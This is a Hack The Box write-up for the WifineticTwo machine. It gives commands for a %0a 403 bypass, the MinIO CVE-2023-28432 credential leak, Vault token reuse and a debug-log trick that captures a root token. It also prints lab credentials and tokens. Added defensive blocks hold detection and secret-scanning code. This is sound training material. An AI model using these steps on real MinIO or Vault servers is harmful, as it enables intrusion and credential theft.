WifineticTwo HTB Writeup | HacktheBox

Introduction

In this post, let’s see how to solve the WifineticTwo CTF from HTB. If you have any doubts, comment down below 👇🏾

Hacking Phases in WifineticTwo

Add IP to /etc/hosts

Nmap Scan

Site Enumeration

Credential Harvest

User Enumeration

Privilege Escalation

Add IP to /etc/hosts

Add domain WifineticTwo.htb to /etc/hosts

sudo nano /etc/hosts


Nmap Scan

Let’s do an Nmap scan.

nmap -A 10.10.11.254 -Pn

Let’s also do subdomain enumeration. We can use Gobuster to discover subdomains.

gobuster dns -d WifineticTwo.htb -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -t 20

We discovered a subdomain, demo.WifineticTwo.htb, which appears to be listed in the host file.

Site Enumeration

We can use the default credentials to log in.

guest:guest

Credential Harvest

On the left panel, we can see MinIO Metrics. When we attempt to access MinIO Metrics, it shows a 403 Forbidden error. So, I bypassed it by adding %0a at the end of the URL.

<http://demo.WifineticTwo.htb/metrics%0a>
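Detection logic for this kind of bypass, added here as an example that is not part of the original writeup: it flags a client that receives a 403 on a path and then a 2xx on the same path with an encoded control character such as %0a attached. The log lines (common log format) and the function name are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (common log format), not from the page.
SAMPLE_LOG = """\
10.10.14.7 - - [01/Mar/2024:10:00:01 +0000] "GET /metrics HTTP/1.1" 403 153
10.10.14.7 - - [01/Mar/2024:10:00:09 +0000] "GET /metrics%0a HTTP/1.1" 200 4821
10.10.14.9 - - [01/Mar/2024:10:01:00 +0000] "GET /files HTTP/1.1" 200 990
10.10.14.9 - - [01/Mar/2024:10:02:00 +0000] "GET /beta%20notes HTTP/1.1" 200 120
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
CONTROL_RE = re.compile(r"[\x00-\x1f\x7f]")


def find_acl_bypasses(log_text):
    """Return (client, raw_path, canonical_path) for every 2xx request whose
    decoded path carries control characters and whose cleaned path was
    answered with 403 for the same client earlier in the log."""
    denied = set()  # (client, canonical path) pairs that received a 403
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        client, _method, raw_path, status = m.groups()
        decoded = unquote(raw_path.split("?", 1)[0])
        canonical = CONTROL_RE.sub("", decoded)  # path with control chars removed
        if status == "403":
            denied.add((client, canonical))
        elif status.startswith("2") and decoded != canonical:
            if (client, canonical) in denied:
                hits.append((client, raw_path, canonical))
    return hits


if __name__ == "__main__":
    for client, raw, canonical in find_acl_bypasses(SAMPLE_LOG):
        print(f"possible ACL bypass: {client} got {raw!r} after 403 on {canonical!r}")
```

The same canonicalisation (decode, then reject or strip control characters) belongs in front of the access rule itself, so that the component enforcing the 403 and the application behind it agree on which path was requested.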

We can see a URL at the endpoint.

<http://prd23-s3-backend.WifineticTwo.htb/minio/v2/metrics/cluster>

Please add “prd23-s3-backend.WifineticTwo.htb” to the /etc/hosts file. We’ve identified a vulnerability, CVE-2023-28432, and there’s a GitHub Proof of Concept (PoC) available.

We need to test this “Information Leak Vulnerability” regarding MinIO. With this vulnerability, it’s possible to discover some credentials related to MinIO. Use BurpSuite to intercept and retrieve the credentials.

"MINIO_ROOT_USER": "5GrE1B2YGGyZzNHZaIww"
"MINIO_ROOT_PASSWORD": "GkpjkmiVmpFuL2d3oRx0"

Install the MinIO client, then run it to set an alias for the server.

./mc alias set myminio http://prd23-s3-backend.WifineticTwo.htb/ 5GrE1B2YGGyZzNHZaIww GkpjkmiVmpFuL2d3oRx0

Let’s check for files.

./mc ls -r --versions myminio

Here we can find some backup files with the .gz extension. I attempted to download those files and decompress them.

./mc cp --vid 2b75346d-2a47-4203-ab09-3c9f878466b8 myminio/askyy/home_backup.tar.gz .
ls -la
tar -xzvf home_backup.tar.gz

User Enumeration

Upon further enumeration of files with the .gz extension, we found these.

export VAULT_API_ADDR="http://prd23-vault-internal.WifineticTwo.htb/"
export VAULT_TOKEN="hvs.CAESIJlU9JMYEhOPYv4igdhm9PnZDrabYTobQ4Ymnlq1qY-LGh4KHGh2cy43OVRNMnZhakZDRlZGdGVzN09xYkxTQVE"
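A pre-upload check that would have caught this, added here as an example that is not part of the original writeup: it scans a .tar.gz backup for Vault service tokens (the `hvs.` prefix seen above) and for secret-looking variable assignments before the archive reaches object storage. The archive contents, function names and the variable-name rule are constructed assumptions.

```python
import io
import re
import tarfile

# Vault service tokens start with "hvs." (as the token on this page does);
# the variable-name rule is a generic assumption for illustration.
TOKEN_RE = re.compile(r"\bhvs\.[A-Za-z0-9_-]{20,}")
ASSIGN_RE = re.compile(
    r"^\s*(?:export\s+)?([A-Z0-9_]*(?:TOKEN|SECRET|PASSWORD)[A-Z0-9_]*)=\S")


def scan_backup(fileobj, max_bytes=1_000_000):
    """Scan a .tar.gz stream and return (member, line_no, reason) findings.
    Secret values themselves are never copied into the result."""
    findings = []
    with tarfile.open(fileobj=fileobj, mode="r:gz") as tar:
        for member in tar:
            if not member.isfile() or member.size > max_bytes:
                continue  # skip directories, links and very large files
            text = tar.extractfile(member).read().decode("utf-8", errors="replace")
            for no, line in enumerate(text.splitlines(), 1):
                if TOKEN_RE.search(line):
                    findings.append((member.name, no, "vault-token"))
                elif (m := ASSIGN_RE.match(line)):
                    findings.append((member.name, no, f"assignment:{m.group(1)}"))
    return findings


def build_sample_backup():
    """Constructed archive standing in for a home-directory backup."""
    files = {
        "home/.bashrc": 'alias ll="ls -l"\nexport VAULT_TOKEN="hvs.' + "A" * 24 + '"\n',
        "home/notes.txt": "nothing sensitive here\n",
        "home/.env": "DB_PASSWORD=constructed-example\n",
    }
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, body in files.items():
            raw = body.encode()
            info = tarfile.TarInfo(name)
            info.size = len(raw)
            tar.addfile(info, io.BytesIO(raw))
    buf.seek(0)
    return buf


if __name__ == "__main__":
    for finding in scan_backup(build_sample_backup()):
        print(finding)
```

On a versioned bucket the check has to cover every stored version, since the archive above was fetched by version ID; a token found this way should be revoked, not just removed from the newest backup.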

Install Vault and add “prd23-vault-internal.WifineticTwo.htb” to the /etc/hosts file. Then, run the commands as follows.

export VAULT_ADDR="http://prd23-vault-internal.WifineticTwo.htb/"
export VAULT_TOKEN="hvs.CAESIJlU9JMYEhOPYv4igdhm9PnZDrabYTobQ4Ymnlq1qY-LGh4KHGh2cy43OVRNMnZhakZDRlZGdGVzN09xYkxTQVE"
./vault login

Firstly, import the configuration file into Vault, and then verify that the token value is valid.

To obtain user access, execute the following command. An OTP will be generated; use it as the password for the SSH connection.

./vault ssh -role dev_otp_key_role -mode otp [email protected]

Privilege Escalation

sudo -l

I executed /root/vault/vault-unseal -c /etc/vault-unseal.yaml:

sudo /root/vault/vault-unseal -c /etc/vault-unseal.yaml -v

We observed that a master token is being generated. We need to copy that to a log file. Therefore, we need to create a .log file in the current directory.

touch debug.log
chown askyy:askyy debug.log
ls -la

Grant the user permission to access debug.log.

Now the debug.log file can be written to by askyy. Execute the following command.

sudo /root/vault/vault-unseal -c /etc/vault-unseal.yaml -d -v /home/askyy/debug.log

The master token has been written to the debug.log file. Please read the debug.log file.

cat debug.log
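The escalation above works because the root-run tool writes its debug output, master token included, into a file that askyy created and owns. The sketch below is an added example (not vault-unseal's code) of how a privileged process can open such a log safely; the function name and the `trusted_uid` parameter are hypothetical.

```python
import os
import stat
import tempfile


def open_secret_log(path, trusted_uid=None):
    """Open a log that may receive secrets, the way a privileged tool should:
    create it exclusively with mode 0600, or accept an existing file only if
    it is a regular file owned by the trusted uid with no group/other access."""
    trusted_uid = os.geteuid() if trusted_uid is None else trusted_uid
    flags = os.O_WRONLY | os.O_APPEND | os.O_NOFOLLOW
    try:
        return os.open(path, flags | os.O_CREAT | os.O_EXCL, 0o600)
    except FileExistsError:
        fd = os.open(path, flags)  # O_NOFOLLOW: a planted symlink raises OSError
    st = os.fstat(fd)  # inspect the opened file, not the path (avoids TOCTOU)
    problems = []
    if not stat.S_ISREG(st.st_mode):
        problems.append("not a regular file")
    if st.st_uid != trusted_uid:
        problems.append(f"owned by uid {st.st_uid}")
    if st.st_mode & 0o077:
        problems.append("accessible by group/other")
    if problems:
        os.close(fd)
        raise PermissionError(f"refusing to log to {path}: " + ", ".join(problems))
    return fd


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as d:
        planted = os.path.join(d, "debug.log")
        open(planted, "w").close()   # pre-created file, as in the steps above
        os.chmod(planted, 0o644)
        try:
            open_secret_log(planted)
        except PermissionError as exc:
            print(exc)
```

With this check a root process (uid 0) rejects a pre-created debug.log owned by another user, and a log it creates itself is unreadable to that user even when it sits in the user's home directory.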

Now we are successfully connected to Vault. We can attempt to log in as the user asks using the same method as before.

export VAULT_ADDR="http://prd23-vault-internal.WifineticTwo.htb/"
export VAULT_TOKEN="hvs.I0ewVsmaKU1SwVZAKR3T0mmG"

To gain root access, execute the following command. An OTP will be generated; use it as the password for the SSH connection.

./vault ssh -role admin_otp_key_role -mode otp [email protected]

Conclusion

In conclusion, the WifineticTwo box presented a series of challenges and vulnerabilities to navigate through, including subdomain discovery, exploitation of CVEs, and leveraging tools like Vault for access management.

Through enumeration, exploitation, and careful manipulation of configurations, various levels of access were achieved, showcasing the importance of thorough reconnaissance and exploitation techniques in penetration testing scenarios.

FAQs

  1. What is WifineticTwo?
    • WifineticTwo is a virtual machine on HacktheBox, designed to simulate real-world cybersecurity challenges for penetration testing practice.
  2. What are the hacking phases involved?
    • Hacking phases include adding IP to /etc/hosts, Nmap scanning, site enumeration, credential harvesting, user enumeration, and privilege escalation.
  3. How do I begin hacking WifineticTwo?
    • Start by adding the domain to /etc/hosts, conduct Nmap scans for enumeration, and explore vulnerabilities like CVEs for exploitation.
  4. What tools are used for hacking WifineticTwo?
    • Tools such as Nmap, Gobuster, BurpSuite, and Vault are utilized for tasks like scanning, enumeration, credential retrieval, and access management.
  5. What are the key takeaways from hacking WifineticTwo?
    • Participants learn critical skills in vulnerability assessment, exploit development, and access control management, crucial for real-world cybersecurity scenarios.
  6. Is prior hacking experience necessary?
    • While prior experience is beneficial, WifineticTwo provides a learning platform suitable for beginners and experienced professionals alike.
  7. How can I ensure ethical hacking practices?
    • Always ensure to perform hacking activities in controlled environments like HacktheBox, adhering to ethical guidelines and legal regulations.
  8. What if I encounter difficulties during hacking?
    • Seek assistance from online communities, forums, or refer to walkthroughs to gain insights and overcome challenges effectively.
